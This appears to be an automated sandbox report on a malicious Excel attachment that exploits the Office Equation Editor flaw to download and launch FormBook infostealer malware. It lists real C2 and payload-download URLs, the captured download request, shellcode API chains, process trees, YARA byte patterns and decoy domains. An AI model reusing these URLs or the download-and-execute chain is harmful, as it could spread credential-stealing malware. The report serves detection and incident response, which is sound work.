Edit tour

Windows Analysis Report
PO 65738963578 Revise Settlement.xlsx

Overview

General Information

Sample Name:	PO 65738963578 Revise Settlement.xlsx
Analysis ID:	626146
MD5:	e5c9c992c088a778a6348f4a58dd78d3
SHA1:	754f386df06785ddd4cb4a04bed626ceab65d5ab
SHA256:	6b8ffb251308a2396f35780df9376b329a6c741419db44ea4f89d88ed932fbf2
Tags:	VelvetSweatshopxlsx
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Shellcode detected

Office equation editor drops PE file

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Office equation editor establishes network connection

Drops PE files to the user root directory

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Downloads executable code via HTTP

Potential document exploit detected (unknown TCP traffic)

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to download and execute PE files

Office Equation Editor has been started

Contains functionality to download and launch executables

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 1980 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 2576 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2372 cmdline: "C:\Users\Public\vbc.exe" MD5: 029BBE98A216416EB698CA543A5C0830)

idcqz.exe (PID: 2428 cmdline: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab MD5: 51F62DEF6DC686B87CC0BAFC31685546)

idcqz.exe (PID: 2544 cmdline: C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab MD5: 51F62DEF6DC686B87CC0BAFC31685546)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cortesdisenosroutercnc.com/itq4/"], "decoy": ["worklocalcortland.com", "hostydom.tech", "ittakegenius.com", "clarisfixion.com", "totalzerosband.com", "shop-for-432.club", "exploremytruth.com", "skarpaknivar.com", "teknikunsur.net", "shoppingclick.online", "808gang.net", "solobookings.com", "mikunandina.com", "insumedkap.com", "kingdomcell.com", "qabetalive838475.com", "foxyreal.website", "filmweltruhr.com", "pokibar.com", "girassolpresentes.com", "rprent.com", "klatch22.com", "qam3.com", "bbuur.com", "grandmino.com", "windowcontractor.info", "myownstack.com", "suprebahia.com", "amaliebeac.space", "rugggedclassicvinyl.com", "thevillagetour.com", "obsoletely.xyz", "fintell.online", "mychianfts.net", "skillingyousoftly.com", "mejicat.com", "tntpowerspeedagility.com", "richardklewis.store", "yourdmvhometeam.com", "citestaccnt1631545392.com", "weddingbyneus.com", "mbkjewelry.com", "shubhamsports.com", "bountyhub.xyz", "heritage.solar", "vitalorganicbarsoap.com", "cloandjoe.com", "royalluxextensions.com", "lbrzandvoort.com", "knowmust.xyz", "okpu.top", "balanz.kitchen", "buggy4t.com", "gownstevensond.com", "f4w6.claims", "workingfromgarden.com", "foryourtinyhuman.com", "preventbiotech.com", "happyklikshop.com", "tuyenxanh.com", "lift2.cloud", "skazhiraku.net", "purpleatticexperiment.com", "freebtc.pro"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.EQNEDT32.EXE.931118.0.raw.unpack	APT_NK_Methodology_Artificial_UserAgent_IE_Win7	Detects hard-coded User-Agent string that has been present in several APT37 malware families.	Steve Miller aka @stvemillertime	0x16e8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 0x16e8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...
2.3.EQNEDT32.EXE.931118.1.unpack	APT_NK_Methodology_Artificial_UserAgent_IE_Win7	Detects hard-coded User-Agent string that has been present in several APT37 malware families.	Steve Miller aka @stvemillertime	0xae8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 0xae8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...
2.3.EQNEDT32.EXE.931118.1.raw.unpack	APT_NK_Methodology_Artificial_UserAgent_IE_Win7	Detects hard-coded User-Agent string that has been present in several APT37 malware families.	Steve Miller aka @stvemillertime	0x16e8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 0x16e8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...
5.2.idcqz.exe.160000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.idcqz.exe.160000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.idcqz.exe.160000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ad9:$sqlite3step: 68 34 1C 7B E1 0x16bec:$sqlite3step: 68 34 1C 7B E1 0x16b08:$sqlite3text: 68 38 2A 90 C5 0x16c2d:$sqlite3text: 68 38 2A 90 C5 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
5.2.idcqz.exe.160000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.idcqz.exe.160000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.idcqz.exe.160000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15cd9:$sqlite3step: 68 34 1C 7B E1 0x15dec:$sqlite3step: 68 34 1C 7B E1 0x15d08:$sqlite3text: 68 38 2A 90 C5 0x15e2d:$sqlite3text: 68 38 2A 90 C5 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
2.2.EQNEDT32.EXE.931118.0.unpack	APT_NK_Methodology_Artificial_UserAgent_IE_Win7	Detects hard-coded User-Agent string that has been present in several APT37 malware families.	Steve Miller aka @stvemillertime	0xae8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 0xae8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...
Click to see the 5 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 198.12.81.20, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2576, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2576, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.cortesdisenosroutercnc.com/itq4/"], "decoy": ["worklocalcortland.com", "hostydom.tech", "ittakegenius.com", "clarisfixion.com", "totalzerosband.com", "shop-for-432.club", "exploremytruth.com", "skarpaknivar.com", "teknikunsur.net", "shoppingclick.online", "808gang.net", "solobookings.com", "mikunandina.com", "insumedkap.com", "kingdomcell.com", "qabetalive838475.com", "foxyreal.website", "filmweltruhr.com", "pokibar.com", "girassolpresentes.com", "rprent.com", "klatch22.com", "qam3.com", "bbuur.com", "grandmino.com", "windowcontractor.info", "myownstack.com", "suprebahia.com", "amaliebeac.space", "rugggedclassicvinyl.com", "thevillagetour.com", "obsoletely.xyz", "fintell.online", "mychianfts.net", "skillingyousoftly.com", "mejicat.com", "tntpowerspeedagility.com", "richardklewis.store", "yourdmvhometeam.com", "citestaccnt1631545392.com", "weddingbyneus.com", "mbkjewelry.com", "shubhamsports.com", "bountyhub.xyz", "heritage.solar", "vitalorganicbarsoap.com", "cloandjoe.com", "royalluxextensions.com", "lbrzandvoort.com", "knowmust.xyz", "okpu.top", "balanz.kitchen", "buggy4t.com", "gownstevensond.com", "f4w6.claims", "workingfromgarden.com", "foryourtinyhuman.com", "preventbiotech.com", "happyklikshop.com", "tuyenxanh.com", "lift2.cloud", "skazhiraku.net", "purpleatticexperiment.com", "freebtc.pro"]}

Multi AV Scanner detection for submitted file

Source: PO 65738963578 Revise Settlement.xlsx	Virustotal: Detection: 41%			Perma Link
Source: PO 65738963578 Revise Settlement.xlsx	ReversingLabs: Detection: 29%

Yara detected FormBook

Source: Yara match	File source: 5.2.idcqz.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.idcqz.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.972513227.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: www.cortesdisenosroutercnc.com/itq4/	Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exeC:	Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exeiiC:	Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exej	Avira URL Cloud: Label: malware
Source: http://198.12.81.20/busy/BUSY.exe	Avira URL Cloud: Label: malware

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BUSY[1].exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected

Source: 2.3.EQNEDT32.EXE.998472.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.3.EQNEDT32.EXE.931118.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.3.EQNEDT32.EXE.998472.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.EQNEDT32.EXE.931118.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 5.2.idcqz.exe.160000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 198.12.81.20 Port: 80

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\hkxhi\tnjelr\oppx\aef3432ff76843aeb030a76c099018f6\zhseks\qyypcejy\Release\qyypcejy.pdb source: vbc.exe, 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmp, idcqz.exe, 00000005.00000000.964431298.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000005.00000002.972687897.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe, 00000006.00000000.967212091.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, idcqz.exe.4.dr, nswAB85.tmp.4.dr

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405D7A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004069A4 FindFirstFileW,FindClose,	4_2_004069A4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0379043F ShellExecuteW,ExitProcess,	2_2_0379043F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_037903A2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03790411 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03790411
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_037902FD ExitProcess,	2_2_037902FD
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_037903BC URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_037903BC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03790332 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03790332
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0379042A ShellExecuteW,ExitProcess,	2_2_0379042A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03790464 ExitProcess,	2_2_03790464
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03790316 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_03790316

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 198.12.81.20:80

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 198.12.81.20:80

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.cortesdisenosroutercnc.com/itq4/

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View

IP Address: 198.12.81.20 198.12.81.20

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 14:42:02 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.17Last-Modified: Fri, 13 May 2022 11:21:13 GMTETag: "3e719-5dee2df4306a6"Accept-Ranges: bytesContent-Length: 255769Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic

HTTP traffic detected: GET /busy/BUSY.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.81.20Connection: Keep-Alive

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_037903A2 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_037903A2

Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.81.20

Source: EQNEDT32.EXE, 00000002.00000002.962051283.0000000000993000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957716678.0000000000995000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957591304.0000000000993000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962051283.0000000000993000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957716678.0000000000995000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957591304.0000000000993000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.12.81.20/busy/BUSY.exe
Source: EQNEDT32.EXE, 00000002.00000003.957575421.000000000098D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.12.81.20/busy/BUSY.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.961987848.00000000008FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://198.12.81.20/busy/BUSY.exeiiC:
Source: EQNEDT32.EXE, 00000002.00000002.962566315.0000000003790000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://198.12.81.20/busy/BUSY.exej
